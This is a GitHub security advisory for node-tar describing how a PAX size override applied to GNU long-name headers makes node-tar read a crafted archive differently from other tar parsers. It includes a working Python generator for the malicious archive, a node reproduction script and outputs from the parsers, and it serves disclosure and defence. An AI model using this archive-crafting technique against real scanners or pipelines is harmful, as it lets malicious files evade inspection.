GHSA-VMF3-W455-68VH
Vulnerability from github – Published: 2026-06-15 17:19 – Updated: 2026-06-15 17:19
Summary
tar (node-tar) applies a PAX extended header's size= record (and other PAX
overrides) to the next header entry of any type, including intermediary
metadata headers such as a GNU long-name (L) or long-link (K) entry. Per
POSIX pax, a PAX extended header (x) describes the next file entry, not the
intermediary extension headers that may sit between the x header and the file
it annotates. Because node-tar lets the PAX size override the byte length of
an intervening L/K/x header, an attacker can desynchronize node-tar's
stream cursor relative to every other mainstream tar implementation
(GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs /
astral-tokio-tar).
The result is a tar parser interpretation differential (CWE-436): a single
crafted archive yields a different set of members under node-tar than under the
reference tar tools. An attacker can use this to hide a member from one parser
while it is visible to another, which defeats security tooling whose scanner and
extractor disagree on archive contents (e.g. a malware/secret scanner that lists
entries with one library while a downstream step extracts with another). node-tar
is one of the most widely deployed JavaScript tar libraries (it backs npm's own
package-tarball handling and is a transitive dependency of a very large fraction
of the npm ecosystem), so the blast radius for "files that extract differently
depending on the tool" is broad.
This is the same root cause and fix that was just addressed upstream in the Rust
tar ecosystem (tar-rs / astral-tokio-tar); node-tar carries the equivalent
defect and has no equivalent guard.
Impact
- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537).
- A crafted archive can present one logical member list to a tool that lists or
scans with node-tar and a different member list to GNU tar / libarchive /
Python tarfile (and vice versa). This lets a malicious file be hidden from a
scanner that uses a different parser than the eventual extractor, or hidden
from node-tar-based inspection while still landing on disk via a system
tar.
- No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers).
- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive.
Vulnerable code (file:line)
src/header.ts (compiled to dist/esm/header.js:49 and
dist/commonjs/header.js:85 in the published tar@7.5.15):
// Header.decode(buf, off, ex, gex)
this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)
ex is the currently-accumulated PAX local extended header and gex the
PAX global header. The size override from ex/gex is applied
unconditionally to whatever header is being decoded next — there is no check
that the header being decoded is a real file entry rather than an intermediary
extension header.
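The precedence in that one-line assignment can be illustrated with a minimal Python sketch. The names `dec_octal` and `decoded_size` are hypothetical and are not part of node-tar; the sketch handles only the plain octal size encoding, whereas node-tar's `decNumber` also covers other encodings, and it models `ex`/`gex` as plain dictionaries.

```python
from typing import Optional


def dec_octal(buf: bytes, off: int, length: int) -> int:
    """Decode a NUL-terminated octal field (simplified; octal encoding only)."""
    raw = bytes(buf[off:off + length]).split(b"\0", 1)[0].strip()
    return int(raw, 8) if raw else 0


def decoded_size(buf: bytes, off: int,
                 ex: Optional[dict], gex: Optional[dict]) -> int:
    """Mirror `ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)`."""
    for pax in (ex, gex):
        # Like `??`, only a missing value falls through; a size of 0 is kept.
        if pax is not None and pax.get("size") is not None:
            return pax["size"]
    return dec_octal(buf, off + 124, 12)


# A header block whose own size field says 13, as a GNU long-name header would.
block = bytearray(512)
block[124:136] = ("%011o\0" % 13).encode()

print(decoded_size(block, 0, None, None))            # size field in the block
print(decoded_size(block, 0, {"size": 2048}, None))  # PAX local override wins
```

Nothing in this lookup consults the header's type, which is the point the paragraph above makes: the override applies to whatever block is decoded next.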
src/parse.ts, [CONSUMEHEADER] constructs the next header with the current
EX/GEX applied:
const header = new Header(chunk, position, this[EX], this[GEX])
and later branches on whether that header is a metadata entry. this[EX] is
cleared only in the non-meta (real file) branch:
if (entry.meta) {
  // L / K / x / g metadata entries: this[EX] is left intact here
  if (entry.size > this.maxMetaEntrySize) {
    entry.ignore = true
    this[STATE] = 'ignore'
    entry.resume()
  } else if (entry.size > 0) {
    this[META] = ''
    entry.on('data', c => (this[META] += c))
    this[STATE] = 'meta'
  }
} else {
  this[EX] = undefined // EX cleared only once a real file entry is reached
}
When the stream is ordered x (PAX, size=N) -> L (GNU long-name) -> file, the
L header is constructed with this[EX] still set, so its size/remain
becomes N instead of the L payload's true length. node-tar then consumes N
bytes of "metadata" and resumes header parsing at the wrong offset, landing
mid-stream. Every other mainstream parser applies the PAX size only to the
following file entry, so they stay synchronized.
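The cursor arithmetic behind the desynchronization can be sketched as follows, using the sizes from this advisory's proof-of-concept archive (a one-block `x` payload, a 13-byte `L` payload, and `size=2048`). The helper names are hypothetical, and the sketch assumes every payload is padded to a whole number of 512-byte blocks.

```python
BLOCK = 512


def padded(n: int) -> int:
    """Round a payload length up to a whole number of 512-byte blocks."""
    return (n + BLOCK - 1) // BLOCK * BLOCK


def next_header_offset(header_offset: int, payload_size: int) -> int:
    """Offset of the header that follows an entry with the given payload size."""
    return header_offset + BLOCK + padded(payload_size)


L_HEADER_OFFSET = 2 * BLOCK  # the x header and its one-block payload come first
TRUE_L_SIZE = 13             # len(b"longname.txt\0")
PAX_SIZE = 2048              # attacker-chosen size= record

# Parser that uses the L header's own size field.
reference_next = next_header_offset(L_HEADER_OFFSET, TRUE_L_SIZE)
# Parser that lets the PAX size override the L header's size.
overridden_next = next_header_offset(L_HEADER_OFFSET, PAX_SIZE)

print(reference_next // BLOCK)   # 4: the file_a header block
print(overridden_next // BLOCK)  # 7: the file_b body block
```

In the second case the block read as a header is file body data, so its checksum does not validate.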
The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is
to not apply PAX size/overrides when the entry being decoded is itself an
extension header (L GNU long-name, K GNU long-link, x PAX local, g PAX
global).
How input reaches the sink
tar.list(), tar.extract()/tar.x(), and tar.Parse/tar.Unpack all route
every 512-byte header block through Header.decode(...) with the
currently-accumulated EX/GEX. Any consumer that parses an attacker-supplied
archive — tar.list, tar.extract, or piping into the streaming Parser —
reaches the sink. No options need to be enabled; the default code path is
affected.
Proof of concept
Archive layout (all standard, GNU-tar-producible blocks):
block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)
block 1 : x payload : the single PAX record "...size=2048\n"
block 2 : L header (GNU long-name '././@LongLink'), real size = 13
block 3 : L payload : "longname.txt\0" (the long name for the next file)
block 4 : file header 'file_a', size = 16
block 5 : file_a body (16 bytes, zero-padded to 512)
block 6 : file header 'file_b', size = 16
block 7 : file_b body (16 bytes, zero-padded to 512)
Generator (make_tar.py, pure stdlib, no external deps):
def hdr(name, size, typeflag):
    h = bytearray(512); name = name[:100]; h[0:len(name)] = name
    h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
    h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
    h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
    h[148:156] = b' ' * 8
    cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
    return bytes(h)

def pad(d):
    return d + b'\0' * ((512 - len(d) % 512) % 512)

def pax_record(key, val):  # length-prefixed PAX record "LEN key=val\n"
    body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
    while True:
        s = str(n).encode() + body
        if len(s) == n: break
        n = len(s)
    return s

pax = pax_record('size', 2048)  # malicious: claim size=2048 for the "next" entry
out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0')
out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')
out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')
out += b'\0' * 1024
open('pax-desync.tar', 'wb').write(out)
A negative-control archive is identical except the PAX record is
pax_record('comment', 'x') (no size=), written to pax-control.tar.
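As a worked example of the length-prefixed record format, the sketch below repeats the generator's `pax_record` helper (reformatted, same logic) and prints the two records used by the malicious and control archives. The length prefix counts its own digits, which is why the helper iterates until the length is stable.

```python
def pax_record(key: str, val) -> bytes:
    """Build a PAX record "LEN key=val\n" where LEN includes its own digits."""
    body = b" %s=%s\n" % (key.encode(), str(val).encode())
    n = len(body)
    while True:
        s = str(n).encode() + body
        if len(s) == n:
            break
        n = len(s)
    return s


malicious = pax_record("size", 2048)
control = pax_record("comment", "x")

print(malicious)  # b'13 size=2048\n'
print(control)    # b'13 comment=x\n'
```

Both records are 13 bytes long, so the two archives share the same block layout and differ only in the content of the PAX record.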
End-to-end reproduction (against pinned version tar@7.5.15, latest release)
Install the published package into a clean project and parse both archives:
$ npm init -y >/dev/null && npm install tar@7.5.15
$ node -e "console.log(require('tar/package.json').version)"
7.5.15
$ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);
e2e.mjs:
import * as tar from 'tar'
async function listEntries(f){
  const got=[], warns=[]
  await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
                   onwarn:(code,_msg)=>warns.push(code) })
  return { got, warns }
}
const mal = await listEntries('pax-desync.tar')
console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
const ctl = await listEntries('pax-control.tar')
console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))
Verbatim output:
=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===
[MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
tar.list() entries : []
tar.list() warnings: ["TAR_ENTRY_INVALID"]
[NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
tar.list() warnings: []
Reference parsers on the same pax-desync.tar:
$ tar tvf pax-desync.tar
-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar
$ bsdtar tvf pax-desync.tar
-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive
$ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
['longname.txt'] # Python tarfile
Interpretation differential: GNU tar, libarchive (bsdtar), and Python tarfile
all list the member longname.txt from pax-desync.tar, whereas node-tar
7.5.15 desynchronizes, raises TAR_ENTRY_INVALID (checksum failure from
landing mid-stream), and reports zero members. The negative control proves
the divergence is caused solely by the PAX size= override being applied to the
intermediary L header — when the same archive carries a PAX record without
size=, node-tar parses it identically to the reference tools
(longname.txt, file_b).
Suggested fix
When decoding a header, do not apply PAX size (or other PAX overrides) if the
header being decoded is itself an extension header. Concretely, in
src/parse.ts clear/ignore this[EX] (and this[GEX] for size) when the
header's type is ExtendedHeader, GlobalExtendedHeader, NextFileHasLongPath
(GNU L), or NextFileHasLongLinkpath (GNU K); equivalently, in
Header.decode, gate the ex?.size ?? gex?.size override on the decoded type
not being one of those extension types. This mirrors the upstream Rust fix,
which guards pax_size with
is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions.
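The shape of that guard can be illustrated with a minimal Python sketch. It is not the node-tar patch or the Rust code; `EXTENSION_TYPEFLAGS` and `effective_size` are hypothetical names, and typeflags are modeled as single bytes.

```python
from typing import Optional

# Typeflags of headers that only carry metadata for a later file entry:
# GNU long-name, GNU long-link, PAX local, PAX global.
EXTENSION_TYPEFLAGS = {b"L", b"K", b"x", b"g"}


def effective_size(typeflag: bytes, header_size: int,
                   pax_size: Optional[int]) -> int:
    """Apply a PAX size override only to non-extension entries."""
    if typeflag in EXTENSION_TYPEFLAGS or pax_size is None:
        return header_size
    return pax_size


print(effective_size(b"L", 13, 2048))  # the L header keeps its own size
print(effective_size(b"0", 16, 2048))  # the file entry takes the PAX size
```

With a guard of this kind, the pending PAX record stays attached to the file entry that follows the extension headers, which matches the behavior the advisory attributes to the reference parsers.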
A fix PR is being prepared against a private fork and will be linked here.
Fix PR
To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo).
Credits
Reported by tonghuaroot.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.15"
},
"package": {
"ecosystem": "npm",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.16"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53655"
],
"database_specific": {
"cwe_ids": [
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T17:19:42Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\n`tar` (node-tar) applies a PAX extended header\u0027s `size=` record (and other PAX\noverrides) to the **next header entry of any type**, including intermediary\nmetadata headers such as a GNU long-name (`L`) or long-link (`K`) entry. Per\nPOSIX pax, a PAX extended header (`x`) describes the *next file entry*, not the\nintermediary extension headers that may sit between the `x` header and the file\nit annotates. Because node-tar lets the PAX `size` override the byte length of\nan intervening `L`/`K`/`x` header, an attacker can desynchronize node-tar\u0027s\nstream cursor relative to every other mainstream tar implementation\n(GNU tar, libarchive/bsdtar, Python `tarfile`, and the now-fixed `tar-rs` /\n`astral-tokio-tar`).\n\nThe result is a tar parser **interpretation differential** (CWE-436): a single\ncrafted archive yields a different set of members under node-tar than under the\nreference tar tools. An attacker can use this to hide a member from one parser\nwhile it is visible to another, which defeats security tooling whose scanner and\nextractor disagree on archive contents (e.g. a malware/secret scanner that lists\nentries with one library while a downstream step extracts with another). 
node-tar\nis one of the most widely deployed JavaScript tar libraries (it backs `npm`\u0027s own\npackage-tarball handling and is a transitive dependency of a very large fraction\nof the npm ecosystem), so the blast radius for \"files that extract differently\ndepending on the tool\" is broad.\n\nThis is the same root cause and fix that was just addressed upstream in the Rust\ntar ecosystem (`tar-rs` / `astral-tokio-tar`); node-tar carries the equivalent\ndefect and has no equivalent guard.\n\n### Impact\n\n- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as\n the prior tar \"smuggling\" advisories GHSA-j5gw-2vrg-8fgx and\n GHSA-fp55-jw48-c537).\n- A crafted archive can present one logical member list to a tool that lists or\n scans with node-tar and a different member list to GNU tar / libarchive /\n Python tarfile (and vice versa). This lets a malicious file be hidden from a\n scanner that uses a different parser than the eventual extractor, or hidden\n from node-tar-based inspection while still landing on disk via a system `tar`.\n- No authentication is required; the only precondition is that a victim parses\n an attacker-supplied tar with node-tar. Tar archives are routinely fetched\n from untrusted sources (package registries, user uploads, CI artifacts,\n container layers).\n- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct\n RCE; it is a building block for supply-chain / scanner-evasion attacks rather\n than a standalone code-execution primitive.\n\n### Vulnerable code (file:line)\n\n`src/header.ts` (compiled to `dist/esm/header.js:49` and\n`dist/commonjs/header.js:85` in the published `tar@7.5.15`):\n\n```ts\n// Header.decode(buf, off, ex, gex)\nthis.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)\n```\n\n`ex` is the currently-accumulated PAX **local** extended header and `gex` the\nPAX **global** header. 
The `size` override from `ex`/`gex` is applied\nunconditionally to whatever header is being decoded next \u2014 there is no check\nthat the header being decoded is a real *file* entry rather than an intermediary\nextension header.\n\n`src/parse.ts`, `[CONSUMEHEADER]` constructs the next header with the current\n`EX`/`GEX` applied:\n\n```ts\nconst header = new Header(chunk, position, this[EX], this[GEX])\n```\n\nand later branches on whether that header is a metadata entry. `this[EX]` is\ncleared only in the non-meta (real file) branch:\n\n```ts\nif (entry.meta) {\n // L / K / x / g metadata entries: this[EX] is left intact here\n if (entry.size \u003e this.maxMetaEntrySize) {\n entry.ignore = true\n this[STATE] = \u0027ignore\u0027\n entry.resume()\n } else if (entry.size \u003e 0) {\n this[META] = \u0027\u0027\n entry.on(\u0027data\u0027, c =\u003e (this[META] += c))\n this[STATE] = \u0027meta\u0027\n }\n} else {\n this[EX] = undefined // EX cleared only once a real file entry is reached\n}\n```\n\nWhen the stream is ordered `x (PAX, size=N) -\u003e L (GNU long-name) -\u003e file`, the\n`L` header is constructed with `this[EX]` still set, so its `size`/`remain`\nbecomes `N` instead of the `L` payload\u0027s true length. node-tar then consumes `N`\nbytes of \"metadata\" and resumes header parsing at the wrong offset, landing\nmid-stream. Every other mainstream parser applies the PAX `size` only to the\nfollowing *file* entry, so they stay synchronized.\n\nThe correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is\nto **not** apply PAX `size`/overrides when the entry being decoded is itself an\nextension header (`L` GNU long-name, `K` GNU long-link, `x` PAX local, `g` PAX\nglobal).\n\n### How input reaches the sink\n\n`tar.list()`, `tar.extract()`/`tar.x()`, and `tar.Parse`/`tar.Unpack` all route\nevery 512-byte header block through `Header.decode(...)` with the\ncurrently-accumulated `EX`/`GEX`. 
Any consumer that parses an attacker-supplied\narchive \u2014 `tar.list`, `tar.extract`, or piping into the streaming `Parser` \u2014\nreaches the sink. No options need to be enabled; the default code path is\naffected.\n\n### Proof of concept\n\nArchive layout (all standard, GNU-tar-producible blocks):\n\n```\nblock 0 : x header (PAX local extended, typeflag \u0027x\u0027), its own size = len(pax body)\nblock 1 : x payload : the single PAX record \"...size=2048\\n\"\nblock 2 : L header (GNU long-name \u0027././@LongLink\u0027), real size = 13\nblock 3 : L payload : \"longname.txt\\0\" (the long name for the next file)\nblock 4 : file header \u0027file_a\u0027, size = 16\nblock 5 : file_a body (16 bytes, zero-padded to 512)\nblock 6 : file header \u0027file_b\u0027, size = 16\nblock 7 : file_b body (16 bytes, zero-padded to 512)\n```\n\nGenerator (`make_tar.py`, pure stdlib, no external deps):\n\n```python\ndef hdr(name, size, typeflag):\n h = bytearray(512); name = name[:100]; h[0:len(name)] = name\n h[100:108] = b\u00270000644\\0\u0027; h[108:116] = b\u00270000000\\0\u0027; h[116:124] = b\u00270000000\\0\u0027\n h[124:136] = (\u0027%011o\\0\u0027 % size).encode(); h[136:148] = b\u002700000000000\\0\u0027\n h[156:157] = typeflag; h[257:263] = b\u0027ustar\\0\u0027; h[263:265] = b\u002700\u0027\n h[148:156] = b\u0027 \u0027 * 8\n cs = sum(h); h[148:156] = (\u0027%06o\\0 \u0027 % cs).encode()\n return bytes(h)\n\ndef pad(d):\n return d + b\u0027\\0\u0027 * ((512 - len(d) % 512) % 512)\n\ndef pax_record(key, val): # length-prefixed PAX record \"LEN key=val\\n\"\n body = b\u0027 %s=%s\\n\u0027 % (key.encode(), str(val).encode()); n = len(body)\n while True:\n s = str(n).encode() + body\n if len(s) == n: break\n n = len(s)\n return s\n\npax = pax_record(\u0027size\u0027, 2048) # malicious: claim size=2048 for the \"next\" entry\nout = hdr(b\u0027PaxHeaders/x\u0027, len(pax), b\u0027x\u0027) + pad(pax)\nout += hdr(b\u0027././@LongLink\u0027, 13, b\u0027L\u0027) + 
pad(b\u0027longname.txt\\0\u0027)\nout += hdr(b\u0027file_a\u0027, 16, b\u00270\u0027) + pad(b\u0027AAAA_file_a_body\u0027)\nout += hdr(b\u0027file_b\u0027, 16, b\u00270\u0027) + pad(b\u0027BBBB_file_b_body\u0027)\nout += b\u0027\\0\u0027 * 1024\nopen(\u0027pax-desync.tar\u0027, \u0027wb\u0027).write(out)\n```\n\nA negative-control archive is identical except the PAX record is\n`pax_record(\u0027comment\u0027, \u0027x\u0027)` (no `size=`), written to `pax-control.tar`.\n\n### End-to-end reproduction (against pinned version `tar@7.5.15`, latest release)\n\nInstall the published package into a clean project and parse both archives:\n\n```\n$ npm init -y \u003e/dev/null \u0026\u0026 npm install tar@7.5.15\n$ node -e \"console.log(require(\u0027tar/package.json\u0027).version)\"\n7.5.15\n$ grep -n \"ex?.size ?? gex?.size\" node_modules/tar/dist/esm/header.js\n49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);\n```\n\n`e2e.mjs`:\n\n```js\nimport * as tar from \u0027tar\u0027\nasync function listEntries(f){\n const got=[], warns=[]\n await tar.list({ file:f, onReadEntry:e=\u003e{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },\n onwarn:(code,_msg)=\u003ewarns.push(code) })\n return { got, warns }\n}\nconst mal = await listEntries(\u0027pax-desync.tar\u0027)\nconsole.log(\u0027MALICIOUS entries :\u0027, JSON.stringify(mal.got), \u0027warnings:\u0027, JSON.stringify(mal.warns))\nconst ctl = await listEntries(\u0027pax-control.tar\u0027)\nconsole.log(\u0027CONTROL entries :\u0027, JSON.stringify(ctl.got), \u0027warnings:\u0027, JSON.stringify(ctl.warns))\n```\n\nVerbatim output:\n\n```\n=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===\n\n[MALICIOUS] archive = x(PAX size=2048) -\u003e L(GNU longname \"longname.txt\") -\u003e file_a(16B) -\u003e file_b(16B)\n tar.list() entries : []\n tar.list() warnings: [\"TAR_ENTRY_INVALID\"]\n\n[NEGATIVE CONTROL] same archive, PAX record is \"comment=x\" (no size= override)\n tar.list() 
entries : [{\"path\":\"longname.txt\",\"size\":16,\"type\":\"File\"},{\"path\":\"file_b\",\"size\":16,\"type\":\"File\"}]\n tar.list() warnings: []\n```\n\nReference parsers on the **same** `pax-desync.tar`:\n\n```\n$ tar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar\n\n$ bsdtar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive\n\n$ python3 -c \"import tarfile; print([m.name for m in tarfile.open(\u0027pax-desync.tar\u0027).getmembers()])\"\n[\u0027longname.txt\u0027] # Python tarfile\n```\n\nInterpretation differential: GNU tar, libarchive (bsdtar), and Python `tarfile`\nall extract the member `longname.txt` from `pax-desync.tar`, whereas node-tar\n`7.5.15` desynchronizes, raises `TAR_ENTRY_INVALID` (checksum failure from\nlanding mid-stream), and reports **zero** members. The negative control proves\nthe divergence is caused solely by the PAX `size=` override being applied to the\nintermediary `L` header \u2014 when the same archive carries a PAX record without\n`size=`, node-tar parses it identically to the reference tools\n(`longname.txt`, `file_b`).\n\n### Suggested fix\n\nWhen decoding a header, do not apply PAX `size` (or other PAX overrides) if the\nheader being decoded is itself an extension header. Concretely, in\n`src/parse.ts` clear/ignore `this[EX]` (and `this[GEX]` for `size`) when the\nheader\u0027s type is `ExtendedHeader`, `GlobalExtendedHeader`, `NextFileHasLongPath`\n(GNU `L`), or `NextFileHasLongLinkpath` (GNU `K`); equivalently, in\n`Header.decode`, gate the `ex?.size ?? gex?.size` override on the decoded type\nnot being one of those extension types. 
This mirrors the upstream Rust fix,\nwhich guards `pax_size` with\n`is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions`.\n\nA fix PR is being prepared against a private fork and will be linked here.\n\n### Fix PR\n\nTo be linked from a private fork of the repository (the fix will not be pushed\nto any public fork or to upstream during embargo).\n\n### Credits\n\nReported by tonghuaroot.",
"id": "GHSA-vmf3-w455-68vh",
"modified": "2026-06-15T17:19:42Z",
"published": "2026-06-15T17:19:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
},
{
"type": "PACKAGE",
"url": "https://github.com/isaacs/node-tar"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)"
}